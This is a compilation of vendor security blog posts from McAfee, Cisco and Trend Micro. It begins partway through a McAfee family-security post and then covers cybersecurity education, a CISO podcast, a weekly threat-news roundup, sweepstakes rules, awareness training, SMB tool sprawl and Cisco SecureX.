Beyond our job of providing online security for devices, our focus at McAfee is on protecting people. Ultimately, that’s the job we aim to do—to help you and your family be safer. Beyond creating software for staying safe, we also put together blogs and resources that help people get sharp on the security topics that matter to them. For parents, check out this page which puts forward some good guidance and advice that can help. Check it out, and we hope that you’ll find even more ways you can keep you and your family safe.

Stay Updated 

To stay updated on all things McAfee and for more resources on staying secure from home, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.



[1] Survey conducted in October 2019, consisting of 600 computer-owning adults in the U.S.


The post What Security Means to Families appeared first on McAfee Blogs.

Cisco Networking Academy is Helping Close the Cybersecurity Skills Gap

Authored by Swati Handa, Global Cybersecurity Strategy Manager, Cisco

This week in #EducationNow, join one of our cybersecurity experts to learn how Cisco Networking Academy is answering the call to cybersecurity education in a rapidly evolving threat landscape.

To say we live in vastly different times than we did six months ago is an understatement. COVID-19 has brought a rapid, seismic shift in how we work, play, and live. Now, more than ever, people are dependent on the internet for nearly every aspect of their lives – work, education, entertainment, healthcare, and more. But this comes with a tremendous risk – increased cyberattacks.

A recent global survey reveals that 91 percent of businesses reported an increase in cyberattacks with employees working from home during the pandemic – with the financial, healthcare, and government sectors being some of the hardest hit (Entrepreneur, 2020). Cyber criminals are capitalizing on health and economic fears surrounding the epidemic, attracting victims with false promises of cures, up-to-date infection statistics, stimulus checks, and more through phish kits, fraud kits, and malware delivery systems. Even before the crisis, CEOs ranked cybersecurity their number one concern (EY, 2019 CEO Imperative Study), and worldwide spending on IT security was forecast to reach $151 billion by 2023 (IDC, Worldwide Security Forecast, 2019–2023). Now things have changed. According to McKinsey & Company, many industries, including healthcare, financial services, technology, and the public sector, are projected to increase their cybersecurity spend to combat the rise in attacks.

Closing the cybersecurity skills gap

Cybersecurity can’t be left solely to technology. It needs human input, too. We need more cybersecurity professionals to help prevent and combat these attacks, but there is a dire shortage globally of 4.07 million cybersecurity professionals, according to the 2019 (ISC)2 Cybersecurity Workforce Study. (ISC)² also reports that the global cybersecurity workforce needs to grow by 145 percent to close the skills gap and better defend organizations worldwide. The answer to the skills gap? Education. Cisco Networking Academy is well-positioned to create the needed cybersecurity professionals to fill that gap – and to provide people with the basic knowledge they need to protect themselves and the organizations they work for.

“Certified cybersecurity professionals on average are paid $71K/year while those without certification earn $55K/year.” – (ISC)² Cybersecurity Workforce Study, 2019

Cisco Networking Academy is answering the call

For over 23 years, Cisco Networking Academy program has been partnering with leading educational institutions around the world to prepare more than 11 million students in 180 countries – from all backgrounds and experiences – for IT careers in our ever-changing digital economy. Last year, 2.1 million students from around the world participated in the program, with 42 percent of students from the Americas, 23 percent from Asia Pacific, Japan, and China (APJC), and 35 percent from Europe, Middle East, Africa, and Russia (EMEAR). Twenty eight percent of those students were female.

Networking Academy’s best-in-class curriculum offers a wide variety of learning portfolios, including basic courses to help the general public learn about everyday vulnerabilities that can affect their daily business and personal lives. For those who wish to explore cybersecurity, or for those who want to begin the steps towards a cybersecurity career, there are foundational and professional level courses that range from recognizing the challenges of the expanding digital economy, to evaluating security vulnerabilities, to ethics and laws. Completion of the “Intro to Cybersecurity” and “Cybersecurity Essentials” courses prepares students for one of three pathways: a CyberOps Associate certification, or higher-level courses in either IoT Security or Cisco Certified Network Associate (CCNA) Security.

The latest cybersecurity course offering is the CyberOps Associate course, which is aligned to the recently launched Cisco Certified CyberOps Associate certification. This new course focuses on cybersecurity operations and provides students with the knowledge and skills needed to monitor, detect, analyze, and respond to cybersecurity threats. It also features enhancements to improve learning effectiveness, including gaming, videos, and more than 30 hours of hands-on labs, featuring virtual machines and Packet Tracer (virtual network simulator) activities.


Average cybersecurity/IT security annual salaries globally from the Global Knowledge 2019 IT Skills and Salary Report

Expanding our impact through partnerships and career resources

The threat landscape may be rapidly evolving, but Cisco Networking Academy is fighting back. While constantly adapting its best-in-class curriculum to meet the rigorous demands of the industry, Networking Academy continues to fund new collaborations to fulfill its mission of empowering all people with career possibilities. By working with government agencies, like ministries of education, and universities and community colleges, Networking Academy now has over 12,000 academies and 26,500 instructors around the world, offering its curriculum to millions of students – both new and those changing careers. It also offers an unparalleled learning experience, incorporating state-of-the-art learning tools, like Packet Tracer, a virtual networking simulator, and learn-a-thons. And students who complete a course earn digital badges that certify their skills: a growing requirement by employers. Additionally, students have a robust set of career resources available to them, including a job matching engine, alumni LinkedIn network, career advice, and more, through the Cisco Networking Academy Talent Bridge.


Learn more about Cisco Networking Academy and explore its cybersecurity courses and pathways.

How are you educating the next generation for the future of cybersecurity? Join us next week in #EducationNow to discuss how algorithms are impacting the way we educate and learn.

Cisco Public Sector Thought Leadership

The post Cisco Networking Academy is Helping Close the Cybersecurity Skills Gap appeared first on Cisco Blogs.

“Don’t fire the CISO”, with Quentyn Taylor

For the latest episode of the Security Stories Podcast, I met someone who actually has the title ‘CISO Supremo’. It’s an award which recognizes the individuals and teams working hard to protect the United Kingdom from cybercrime.

Security Stories: Quentyn Taylor


As well as being CISO Supremo, Quentyn Taylor is also the CISO for Canon Europe. Odds are that you might have had your hands on a Canon camera or a printer at one point in your life. If you’ve ever had a security related query about one of their products in Europe, it’s Quentyn’s team whom you would have spoken to.

That’s because they are a customer centric security team (as well as also protecting the internal aspects of the business). Hearing the story behind this was incredibly interesting.

It’s clear from the get go how passionate Quentyn is about the cybersecurity industry. During the podcast we talk about having a degree vs. relevant experience, and how to overcome the “virtual hurdle” of working remotely. Like many of us, Quentyn is really missing those in person interactions with his team members. We also talk about data breaches, and why firing the CISO shouldn’t be the first resort.

We then end the interview as all interviews should: with a spot of cybersecurity cocktail making.

“T-shaped” people

One of the biggest things I took away from our chat, is the concept of “T-shaped” people. I hadn’t heard the term before, but apparently it’s fairly common in the recruitment and agile software world.

For anyone who doesn’t know, a “T-shaped” person is someone who is an expert in one particular field but also spends time acquiring different skills. For example, a cybersecurity engineer who spends some time on the IT help desk, or even in the PR team, as some of Quentyn’s team do.

I really like that, because it means that it doesn’t matter what age you are, or what field you’re in. You can learn another skill, see the other side of the coin, and bring that knowledge back to your area of expertise.

It occurred to me that if more people did that, i.e. explored other departments in a business than their own, we might see more harmonious communication between different teams.

And that applies to security as well. As Quentyn was saying, those of us in the cybersecurity industry often think that security is the most important thing in any business. Because we have a natural bias, and, well, we’ve seen things…

However, business decisions are made for various reasons at the time, and sometimes security is not the foundational factor behind them. Or, there’s a level of security risk that people are prepared to shoulder.

In those scenarios, the role of the cybersecurity team is to find a way to cushion the risk. Even if the simplest, or the fastest, solution isn’t a solution any more. We’ll find another way to support you.

On this Day: Mirai botnet


Also in episode 10, we take the DeLorean for a short spin back to 2016. “On this Day” is a regular Security Stories feature, where we visit a significant cybersecurity event from the past, and this time, we explored the story behind the Mirai botnet.

After it first surfaced in August, Mirai came to the media’s attention a few weeks later when researcher Brian Krebs was targeted by a large DDoS attack.

In his debrief with Akamai (the CSO of which, Andy Ellis, we spoke to in the last episode), it was noted that rather than relying on DNS amplification to achieve such traffic, it seemed to have come from many different sources.

This suggested that an enormous number of devices were compromised, and soon enough the world started to hear and read the word “Mirai”.

You can listen to this podcast on Apple Podcasts, Spotify, Google Podcasts, or wherever you normally get your podcasts from! You can also listen right here and now:

Are you a security leader who would like to share their story on the podcast?
Please get in touch with me on LinkedIn and we’ll take it from there.

Security Stories podcast

On the Security Stories Podcast, we meet pioneers from across the world of cybersecurity, who then share their experiences with us.

The post “Don’t fire the CISO”, with Quentyn Taylor appeared first on Cisco Blogs.

This Week in Security News: Mirai Botnet Exploit Weaponized to Attack IoT Devices via CVE-2020-5902 and Vermont Taxpayers Warned of Data Leak Over the Past Three Years

Welcome to our weekly roundup, where we share what you need to know about the cybersecurity news and events that happened over the past few days. This week, read about how Trend Micro found an IoT Mirai botnet downloader that can be added to new malware variants to scan for exposed Big-IP boxes for intrusion. Also, learn about how the Vermont Department of Taxes may have been exposing taxpayer data for more than three years.

Read on:

Ransomware is Still a Blight on Business

Ransomware has been with us for years, but only really became mainstream after the global WannaCry and NotPetya incidents of 2017. Now mainly targeting organizations in lieu of consumers, and with increasingly sophisticated tools and tactics, the cybercriminals behind these campaigns have been turning up the heat during the COVID-19 pandemic. That’s why we need industry partnerships like No More Ransom.

Garmin Outage Caused by Confirmed WastedLocker Ransomware Attack

Wearable device maker Garmin shut down some of its connected services and call centers last week following what the company called a worldwide outage, now confirmed to be caused by a WastedLocker ransomware attack. Garmin’s product line includes GPS navigation and wearable technology for the automotive, marine, aviation, fitness, and outdoor markets.

Trend Micro Launches Cloud Solution for Microsoft Azure

Trend Micro announced the availability of its Trend Micro Cloud One – Conformity offering to Azure customers, helping global organizations tackle misconfigurations, compliance challenges and cyber-risks in the cloud. The company also achieved the CIS Microsoft Azure Foundation Security Benchmark, certifying that the Conformity product has built-in rules to check for more than 100 best practices in the CIS framework.

Ensiko: A Webshell with Ransomware Capabilities

Ensiko is a PHP web shell with ransomware capabilities that targets platforms such as Linux, Windows, macOS, or any other platform that has PHP installed. The malware has the capability to remotely control the system and accept commands to perform malicious activities on the infected machine. It can also execute shell commands on an infected system and send the results back to the attacker via a PHP reverse shell.

‘Boothole’ Threatens Billions of Linux, Windows Devices

A newly discovered serious vulnerability – dubbed “BootHole” – with a CVSS rating of 8.2 could unleash attacks that could gain total control of billions of Linux and Windows devices. Security firm Eclypsium researchers released details this week about how the flaw can take over nearly any device’s boot process.

Mirai Botnet Exploit Weaponized to Attack IoT Devices via CVE-2020-5902

Following the initial disclosure of two F5 BIG-IP vulnerabilities in early July, Trend Micro continued monitoring and analyzing the vulnerabilities and other related activities to further understand their severities. Based on the workaround published for CVE-2020-5902, Trend Micro found an IoT Mirai botnet downloader that can be added to new malware variants to scan for exposed Big-IP boxes for intrusion and deliver the malicious payload.

Hackers Stole GitHub and GitLab OAuth Tokens from Git Analytics Firm Waydev

Waydev, a San Francisco-based company, runs a platform that can be used to track software engineers’ work output by analyzing Git-based codebases. Earlier this month, the company disclosed a security breach, saying that hackers broke into its platform and stole GitHub and GitLab OAuth tokens from its internal database.

Application Security 101

As the world currently grapples with the disruption brought about by the coronavirus pandemic, the need for digital transformation has become not only more apparent but also more urgent.  Applications now play an integral role, with many businesses and users relying on a wide range of applications for work, education, entertainment, retail, and other uses.

Vermont Taxpayers Warned of Data Leak Over the Past Three Years

The Vermont Department of Taxes may have been exposing taxpayer data that could be used in credential scams for more than three years due to a vulnerability in its online tax filing system. A notice posted on the department’s website warned taxpayers who filed a Property Transfer Tax return through the department’s online filing site between Feb. 1, 2017, and July 2, 2020, may have had their personal information leaked.

Guidelines Related to Security in Smart Factories Part 6: MITRE ATT&CK

This blog series explains examples of general-purpose guidelines for ICS and OT security and helps readers understand the concepts required for security in smart factories. Thus far, parts one through five have explained IEC62443, the NIST CSF, part of the P800 series, and CIS Controls. In part six, Trend Micro explains MITRE ATT&CK, which, although not a guideline, is a knowledge base in which offensive and defensive techniques used in cyber-attacks are clearly organized.

If You Own One of These 45 Netgear Devices, Replace It: Firm Won’t Patch Vulnerable Gear Despite Live Proof-of-Concept Code

Netgear has decided not to patch more than 40 home routers to plug a remote code execution vulnerability – despite security researchers having published proof-of-concept exploit code. The vulnerability was revealed publicly in June by Trend Micro’s Zero Day Initiative (ZDI).

Online Dating Websites Lure Japanese Customers to Scams

In May, Trend Micro observed a sudden increase in traffic to online dating websites primarily targeting Japanese customers. After analyzing and tracking these numbers, we found that these dating scam campaigns attract potential victims by using different website domains that share similar page layouts. By the end of the transaction, the fraudsters have taken the victims' money without the subscribers receiving any of the advertised results.

ESG Findings on Trend Micro Cloud-Powered XDR Drives Monumental Business Value

Trend Micro’s cloud-powered XDR and Managed XDR offerings optimize threat detection and response across all critical vectors. In a recent survey commissioned by Trend Micro and conducted by ESG, organizations surveyed experience faster detection and less alert fatigue as a result of intelligently using data from all their security controls (including those covering endpoints, email, servers, cloud workloads and networks).

How does your organization manage threat detection and response? Share your thoughts in the comments below or follow me on Twitter to continue the conversation: @JonLClay.

The post This Week in Security News: Mirai Botnet Exploit Weaponized to Attack IoT Devices via CVE-2020-5902 and Vermont Taxpayers Warned of Data Leak Over the Past Three Years appeared first on .

Security is a Feeling- With the McAfee #SecureMyLife RT2Win Sweepstakes!

Security is a Feeling: Share it with the McAfee #SecureMyLife RT2Win Sweepstakes!

The word ‘security’ means something unique to everyone. Security is a feeling, an emotion, a sense of belonging and place: It could be the feeling of cuddling as a family in a pillow fort, making sure your house is locked at night, or always having a smartphone in your pocket for directions or an emergency.

Though our digital devices are convenient, they can also raise security concerns because of overlooked weaknesses. Check out the latest research from the McAfee team for more information.

While all this dazzling technology has its appeal, we here at McAfee understand the importance of creating new security solutions for those who want to live their connected lives with confidence.

In fact, to celebrate the latest innovations, we’re giving two [2] lucky people the chance to win an Amazon gift card. Not a customer? Not a problem! Simply retweet one of our contest tweets with the required hashtags between August 3rd, 2020 and August 16th, 2020 for your chance to win. Follow the instructions below to enter, and good luck!

#RT2Win Sweepstakes Official Rules

  • To enter, go to @McAfee_Home on Twitter and find the #RT2Win sweepstakes tweet.
  • Four [4] sweepstakes tweets will be released on the following schedule, each including the hashtags #RT2Win, #Sweepstakes AND #SecureMyLife:
    • Monday, August 3, 2020 at 9:05AM PDT
    • Thursday, August 6, 2020 at 9:05AM PDT
    • Monday, August 10, 2020 at 9:05AM PDT
    • Thursday, August 13, 2020 at 9:05AM PDT
  • Retweet the sweepstakes tweet released on the above date before 11:59PM PDT, from your own handle. The #RT2Win, #Sweepstakes AND #SecureMyLife hashtags must be included to be entered.
  • Sweepstakes will end on Sunday, August 16, 2020 at 11:59PM PT. All entries must be made before that date and time.
  • Winners will be notified on Wednesday, August 19, 2020 via Twitter direct message.
  • Limit one entry per person.

     1. How to Win:

Retweet one of our contest tweets on @McAfee_Home that include “#RT2Win, #Sweepstakes, and #SecureMyLife” for a chance at an Amazon gift card. Two [2] winners will be selected by 10:00 AM PT on August 19, 2020. Winners will be notified by direct message on Twitter. For full Sweepstakes details, please see the Terms and Conditions below.

McAfee #SecureMyLife RT2Win Sweepstakes Terms and Conditions

     2. How to Enter: 

No purchase necessary. A purchase will not increase your chances of winning. McAfee’s #RT2Win Sweepstakes will be conducted from August 3rd through August 16th. All entries for each day of the #SecureMyLife RT2Win Sweepstakes must be received during the time allotted for the #RT2Win Sweepstakes. Pacific Daylight Time shall control the McAfee RT2Win Sweepstakes. The #SecureMyLife RT2Win Sweepstakes duration is as follows:

#RT2Win Sweepstakes:

  • Begins: Monday, August 3rd, 2020 at 7:00am PDT
  • Ends: Sunday, August 16, 2020 at 11:59pm PDT
    • Opportunity 1: Monday, August 3, 2020 at 9:05AM PDT
    • Opportunity 2: Thursday, August 6, 2020 at 9:05AM PDT
    • Opportunity 3: Monday, August 10, 2020 at 9:05AM PDT
    • Opportunity 4: Thursday, August 13, 2020 at 9:05AM PDT
  • Winners will be announced: by 10:00AM PDT, August 19, 2020

For the #SecureMyLife RT2Win Sweepstakes, participants must complete the following steps during the time allotted for the #SecureMyLife RT2Win Sweepstakes:

  1. Find the sweepstakes tweet of the day posted on @McAfee_Home, which will include the hashtags #SecureMyLife, #RT2Win and #Sweepstakes.
  2. Retweet the sweepstakes tweet of the day and make sure it includes the #McAfee, #SecureMyLife, #RT2Win and #Sweepstakes hashtags.
     Note: Tweets that do not contain the #SecureMyLife, #RT2Win and #Sweepstakes hashtags will not be considered for entry.
  3. Limit one entry per person.

Two (2) winners will be chosen for the #McAfee #SecureMyLife Sweepstakes tweet from the viable pool of entries that retweeted and included the required hashtags. McAfee and the McAfee social team will select winners at random from among the viable entries. The winners will be announced and privately messaged on August 19, 2020 from the @McAfee_Home Twitter handle. No other method of entry will be accepted besides Twitter. Only one entry per user is allowed, per Sweepstakes. SWEEPSTAKES IS IN NO WAY SPONSORED, ENDORSED, ADMINISTERED BY, OR ASSOCIATED WITH TWITTER, INC.

     3. Eligibility: 

McAfee’s #RT2Win Sweepstakes is open to all legal residents of the 50 United States who are 18 years of age or older on the date the #SecureMyLife RT2Win Sweepstakes begins and live in a jurisdiction where this prize and the #SecureMyLife RT2Win Sweepstakes are not prohibited. Employees of Sponsor and its subsidiaries, affiliates, prize suppliers, and advertising and promotional agencies, their immediate families (spouses, parents, children, and siblings and their spouses), and individuals living in the same household as such employees are ineligible.

     4. Winner Selection:

Winners will be selected from the eligible entries received during the #SecureMyLife RT2Win Sweepstakes periods. Sponsor will select the names of two [2] potential winners of the prizes in a random drawing from among all eligible submissions at the address listed below. The odds of winning depend on the number of eligible entries received. By participating, entrants agree to be bound by the Official #SecureMyLife RT2Win Sweepstakes Rules and the decisions of the coordinators, which shall be final and binding in all respects.

     5. Winner Notification:

Each winner will be notified via direct message (“DM”) on Twitter by August 19, 2020. Prize winners may be required to sign an Affidavit of Eligibility and Liability/Publicity Release (where permitted by law) to be returned within ten (10) days of written notification, or the prize may be forfeited and an alternate winner selected. If a prize notification is returned as unclaimed or undeliverable to a potential winner, if a potential winner cannot be reached within twenty-four (24) hours from the first DM notification attempt, if a potential winner fails to return the requisite document within the specified time period, or if a potential winner is not in compliance with these Official Rules, then such person shall be disqualified and, at Sponsor’s sole discretion, an alternate winner may be selected for the prize at issue based on the winner selection process described above.

     6. Prizes: 

The prizes for the #SecureMyLife RT2Win Sweepstakes are two [2] $100 Amazon e-gift cards (approximate retail value “ARV” of each prize is $100 USD; the total ARV of all gift cards is $200 USD). Entrants agree that Sponsor has the sole right to determine the winners of the #SecureMyLife RT2Win Sweepstakes and all matters or disputes arising from the #SecureMyLife RT2Win Sweepstakes and that its determination is final and binding. There are no prize substitutions, transfers or cash equivalents permitted except at the sole discretion of Sponsor. Sponsor will not replace any lost or stolen prizes. Sponsor is not responsible for delays in prize delivery beyond its control. All other expenses and items not specifically mentioned in these Official Rules are not included and are the prize winners’ sole responsibility.

      7. General Conditions: 

Entrants agree that by entering they agree to be bound by these rules. All federal, state, and local taxes, fees, and surcharges on prize packages are the sole responsibility of the prizewinner. Sponsor is not responsible for incorrect or inaccurate entry information, whether caused by any of the equipment or programming associated with or utilized in the #SecureMyLife RT2Win Sweepstakes, or by any technical or human error which may occur in the processing of the #SecureMyLife RT2Win Sweepstakes entries. By entering, participants release and hold harmless Sponsor and its respective parents, subsidiaries, affiliates, directors, officers, employees, attorneys, agents, and representatives from any and all liability for any injuries, loss, claim, action, demand, or damage of any kind arising from or in connection with the #SecureMyLife RT2Win Sweepstakes, any prize won, any misuse or malfunction of any prize awarded, participation in any #SecureMyLife RT2Win Sweepstakes-related activity, or participation in the #SecureMyLife RT2Win Sweepstakes. Except for applicable manufacturer’s standard warranties, the prizes are awarded “AS IS” and WITHOUT WARRANTY OF ANY KIND, express or implied (including any implied warranty of merchantability or fitness for a particular purpose).

If participating in this Sweepstakes via your mobile device (which service may only be available via select devices and participating wireless carriers and is not required to enter), you may be charged for standard data use from your mobile device according to the terms in your wireless service provider’s data plan.  Normal airtime and carrier charges and other charges may apply to data use and will be billed on your wireless device bill or deducted from your pre-paid balance.  Wireless carrier rates vary, so you should contact your wireless carrier for information on your specific data plan.

      8. Limitations of Liability; Releases:

By entering the Sweepstakes, you release Sponsor and all Released Parties from any liability whatsoever, and waive any and all causes of action, related to any claims, costs, injuries, losses, or damages of any kind arising out of or in connection with the Sweepstakes or delivery, misdelivery, acceptance, possession, use of or inability to use any prize (including claims, costs, injuries, losses and damages related to rights of publicity or privacy, defamation or portrayal in a false light, whether intentional or unintentional), whether under a theory of contract, tort (including negligence), warranty or other theory.

To the fullest extent permitted by applicable law, in no event will the sponsor or the released parties be liable for any special, indirect, incidental, or consequential damages, including loss of use, loss of profits or loss of data, whether in an action in contract, tort (including, negligence) or otherwise, arising out of or in any way connected to your participation in the sweepstakes or use or inability to use any equipment provided for use in the sweepstakes or any prize, even if a released party has been advised of the possibility of such damages.

  1. To the fullest extent permitted by applicable law, in no event will the aggregate liability of the released parties (jointly) arising out of or relating to your participation in the sweepstakes or use of or inability to use any equipment provided for use in the sweepstakes or any prize exceed $10. The limitations set forth in this section will not exclude or limit liability for personal injury or property damage caused by products rented from the sponsor, or for the released parties’ gross negligence, intentional misconduct, or for fraud.

     2. Use of Winner’s Name, Likeness, etc.: Except where prohibited by law, entry into the Sweepstakes constitutes permission to use your name, hometown, aural and visual likeness and prize information for advertising, marketing, and promotional purposes without further permission or compensation (including in a public-facing winner list). As a condition of being awarded any prize, except where prohibited by law, winner may be required to execute a consent to the use of their name, hometown, aural and visual likeness and prize information for advertising, marketing, and promotional purposes without further permission or compensation.

     By entering this Sweepstakes, you consent to being contacted by Sponsor for any purpose in connection with this Sweepstakes.

      9. Prize Forfeiture:

If a winner cannot be notified, does not respond to notification, does not meet eligibility requirements, or otherwise does not comply with these #SecureMyLife RT2Win Sweepstakes rules, then the winner will forfeit the prize and an alternate winner will be selected from the remaining eligible entries for each #SecureMyLife RT2Win Sweepstakes.

     10. Dispute Resolution:

Entrants agree that Sponsor has the sole right to determine the winners of the #SecureMyLife RT2Win Sweepstakes and all matters or disputes arising from the #SecureMyLife RT2Win Sweepstakes and that its determination is final and binding. There are no prize substitutions, transfers or cash equivalents permitted except at the sole discretion of Sponsor.

     11. Governing Law & Disputes:

Each entrant agrees that any disputes, claims, and causes of action arising out of or connected with this sweepstakes or any prize awarded will be resolved individually, without resort to any form of class action and these rules will be construed in accordance with the laws, jurisdiction, and venue of New York.

     12. Privacy Notice:

Personal information obtained in connection with this #SecureMyLife RT2Win Sweepstakes will be handled in accordance with the policy set forth at

  1. Winner List; Rules Request: For a copy of the winner list, send a stamped, self-addressed, business-size envelope for arrival after January 10th 2020 and before August 16th 2021 to the address listed below, Attn: #RT2Win Sweepstakes. To obtain a copy of these Official Rules, visit this link or send a stamped, self-addressed business-size envelope to the address listed below, Attn: Consumer Content Marketing. VT residents may omit return postage.
  2. Intellectual Property Notice: McAfee and the McAfee logo are registered trademarks of McAfee, LLC. The Sweepstakes and all accompanying materials are copyright © 2018 by McAfee, LLC.  All rights reserved.
  3. Sponsor: McAfee, LLC, Corporate Headquarters 2821 Mission College Blvd. Santa Clara, CA 95054 USA

The post Security is a Feeling- With the McAfee #SecureMyLife RT2Win Sweepstakes! appeared first on McAfee Blogs.

Using Security Awareness to Empower Your Most Important Assets

You’ve invested time and money into the security of your organization’s network. You’re protecting everything from your data to endpoints and networks. So, it’s no surprise that your IT department throws its hands up when a happy clicker in your organization inadvertently launches a malware attack, enticed by what looked like a legitimate link in an email.

The volume of phishing threats continues to increase, and bad actors are getting more sophisticated, which often means that phishing emails look and feel increasingly authentic.

  • Over 3.4 billion email scams or phishing emails are sent every day. This adds up to more than one trillion email scams per year (Security Magazine)
  • Data breaches exposed 4.1 billion records in the first half of 2019. (RiskBased)
  • 62% of businesses experienced phishing and social engineering attacks in 2018. (Cybint Solutions)
  • 52% of breaches featured hacking, 28% involved malware and 32–33% included phishing or social engineering, respectively. (Verizon)

It’s become evident that, frequently, the weakest link in many cybersecurity defenses is people. In fact, according to the 2019 Gartner Magic Quadrant for Security Awareness Computer-Based Training, “People influence security more than technology or policy and cybercriminals know how to exploit human behaviors.”

So, while technology continues to evolve, the human element will always be the most unpredictable variable to secure. In order to fortify against people-enabled losses, organizations are turning to security awareness and training programs. Recent events have highlighted an increased need for security awareness as the vast move to a remote workforce has unveiled new, targeted threats that require employees to detect on their own.

Cisco Security Awareness is designed to help promote and apply effective cybersecurity common sense by modifying end-user behavior. Using engaging and relevant computer-based content with various simulated attack methods, this cloud-delivered product provides comprehensive simulation, training, and reporting so that employee progress can be continually monitored and tracked, an important part of compliance standards such as HIPAA and GDPR.

A Comprehensive Approach to Combat Phishing

Leveraging the power of other leading Cisco Security technologies, Cisco Security Awareness provides a comprehensive and robust defense against phishing attacks.

  • Analyze your organization’s security awareness needs and set strategic objectives
  • Plan your awareness program including phishing simulation, awareness training, communication, and reinforcement plan
  • Optimize program performance by setting and measuring against strategic metrics and KPIs

Empower the people in your organization to play a critical role in its overall security with Cisco Security Awareness. Sign up for a free trial today.

The post Using Security Awareness to Empower Your Most Important Assets appeared first on Cisco Blogs.

SMB Cybersecurity: More products, more problems?

The importance of a simplified approach to security

As cybercriminals continue to find new ways to breach security defenses, keeping your organization secure may start to feel overwhelming. Security teams are constantly striving to stay ahead, but it can be difficult to decide what to prioritize. So, in a sea of new security products and recommendations, how can small and medium sized businesses decide where to invest their finite resources?

In a recent Cisco Chat Live streamcast, Cisco Product Marketing Manager Hazel Burton, Cisco Advisory CISO Wolf Goerlich, and Elevate Security Co-founder Masha Sedova sit down to discuss ways of cutting through the noise and simplifying security.


More products, more problems?

Wolf Goerlich describes an outage he and his team faced in a previous organization, during which their remediation was complicated by too many alerts:

“The security guy comes back and says, ‘It’s clearly a denial of service.’ I said, ‘Alright. That kind of makes sense with your data.’ The networking guy goes, ‘Wait a minute. We think the problem is on the edge because we’re not seeing many packets.’ The compute guy says, ‘No, the problem is clearly on our servers because the CPU is spiking right now’…. The entire outage got stretched out just trying to get everyone on the same page with all of these counsels on these data points.”

This anecdote is also supported by a survey we conducted across almost 500 SMBs (defined here as organizations with 250-499 employees). Respondents were asked to report the number of hours lost during the most severe security breach faced in the past year. This was correlated with the number of security vendors their organization uses.

[Chart: Number of security vendors used within the security environment versus systems downtime due to the most severe security breach managed in the past year. Source: SMB Cybersecurity Report]

Surprisingly, it appears that the more vendors an organization used, the less effective those tools were in mitigating a severe breach. In fact, organizations using 2-5 vendors had an estimated downtime of around 5 hours, while organizations using 50 or more vendors reported an average downtime of about 17 hours.

While there are a multitude of reasons behind why certain breaches cause longer downtimes than others, the complexity of trying to compile data across many vendors and tools seems to be a contributing factor.

The importance of not exceeding your team’s “cognitive maximum”

This data suggests that security teams have a limit to the number of tools they can feasibly juggle before reaching what Wolf coins as their “cognitive maximum.” When security teams are asked to use an overwhelming number of products, they may not be able to pinpoint where an issue lies.

Unfortunately, security teams that feel inundated by tools and disparate data can experience cybersecurity fatigue – or the feeling that they simply can’t keep up with incoming threats. To learn more about the symptoms of cybersecurity fatigue and how it can be managed, check out the clip below.

Homing in on the solutions that will best help you

To avoid overwhelming security teams, Masha Sedova recommends focusing on the threats your organization is most vulnerable to experiencing. Getting to know which threats most impact you and prioritizing accordingly is a great way to simplify your security approach, and may help when deciding which solutions are worth investing in.

Masha suggests using tools like the Verizon Data Breach Investigations Report to determine which risks to consider targeting. In the second installment of our SMB Cybersecurity Series, we discussed the SMB threat landscape. You can see our findings on which threats SMBs are currently facing here. Additionally, Cisco’s Threat of the Month series recently dedicated a post to the remote work threat landscape, which can be found here.

Keeping it simple by focusing on the basics

One of the best measures to keep your security program as simple as possible, as Masha recommends, is making sure the basics are covered. Knowing which data is stored where, for example, can be extremely helpful in determining where an attack is coming from.

With a solid foundation and a good understanding of what to prioritize, you may find it easier to incorporate relevant security solutions without adding undue complexity. For more tips on simplifying your security operations, check out the clip above. To watch the full Cisco Chat Live discussion, please visit Cisco Chat Live SMB Myth Busting.

Note: This blog is the last in a five-part series.

Read the previous blogs in our SMB Cybersecurity Series to learn more.

If you are interested in unpacking more myths surrounding SMB security, consider reading “Big Security in a Small Business World.”

The post SMB Cybersecurity: More products, more problems? appeared first on Cisco Blogs.

Cisco SecureX – What’s driving our platform?

Learn about the latest innovations powering our integrated security approach

Cisco SecureX is the result of many years of developing industry-leading security technologies, and then finding ways to make them even better by enabling them to work together. It’s a careful balance of building a platform out of the capabilities of each product, which then adds to the experience of having all of those products and makes each product stronger. Sound like a lot to expect? It’s the least we can do for our customers.

“Having all of Cisco’s tools so well integrated really gives us defense-in-depth and layered protection,” said Don Bryant, CISO at The University of North Carolina at Pembroke, in our recent report, Simplify to Secure. “Having a more holistic security platform has really helped us make more progress toward our end goal in a short amount of time.”

Indeed, a platform should bring forth an already strong roster of security technologies, and then further improve upon them through integration, automation, and continued innovation. The Cisco Secure portfolio is built on a broad set of capabilities that protect your network, users and endpoints, cloud, and applications. And it’s backed by the unrivaled threat intelligence of Cisco Talos. SecureX draws from all of this to enhance collaboration among your teams, and visibility across your infrastructure, with the end goal of streamlining security operations and accelerating threat response.

And innovation continues across the products and platform. Along with the launch of Cisco SecureX came several new capabilities that help future-proof our solutions. We don’t just want to offer you a platform and call it a day. Cisco SecureX is meant to be a living, breathing entity that evolves with you as your needs change. It’s a mix of well-established and new security offerings, and it will continue to adapt as the threat landscape expands.

Our core technologies – made better

Cisco delivers unparalleled security analytics across network and cloud

When enterprise networks began to expand with the introduction of cloud and BYOD, for example, one of our core technologies, in this case providing network traffic analytics, was on the front lines. In fact, Cisco Stealthwatch was created two decades ago to provide much-needed visibility into enterprise environments. That need only grew as infrastructure extended beyond the physical walls of modern businesses. Now, Stealthwatch gives our customers the benefit of a network analytics offering that has grown up with the networks it helps secure.

As the attack surface has evolved over the years and threat actors have become more sophisticated, Stealthwatch has continued to serve as the eyes and ears of the network – delivering pervasive insight into who’s in your environment and what they’re doing – 24/7/365. Today, as much of the world’s population works from home, we find ourselves at another crossroads where there’s an unprecedented need for Stealthwatch’s in-depth, scalable analytics.

Stealthwatch is again rising to the challenge, closely monitoring organizations’ extended infrastructure for any anomalies that could signify an attack. In addition to on-premises network traffic, Stealthwatch can also monitor all major public cloud environments, as well as private clouds and endpoint data, to provide truly comprehensive visibility. And, it’s the only solution that can perform analytics on encrypted traffic without decryption.

By being a part of Cisco SecureX, Stealthwatch gains greater context into network and user behaviors from across the portfolio, and can also leverage the platform to take automated mitigation actions. Likewise, the other solutions within our portfolio can pull from Stealthwatch’s insights to increase their efficacy. This results in expedited incident investigations and remediation across the platform.

Cisco Talos brings unrivaled threat intelligence 

Cisco Talos is the largest non-governmental threat intelligence team in the world, with over 350 professionals working around the clock to uncover emerging threats. For years, its findings have been fed into our entire security portfolio, including Stealthwatch, to strengthen our customers’ defenses.

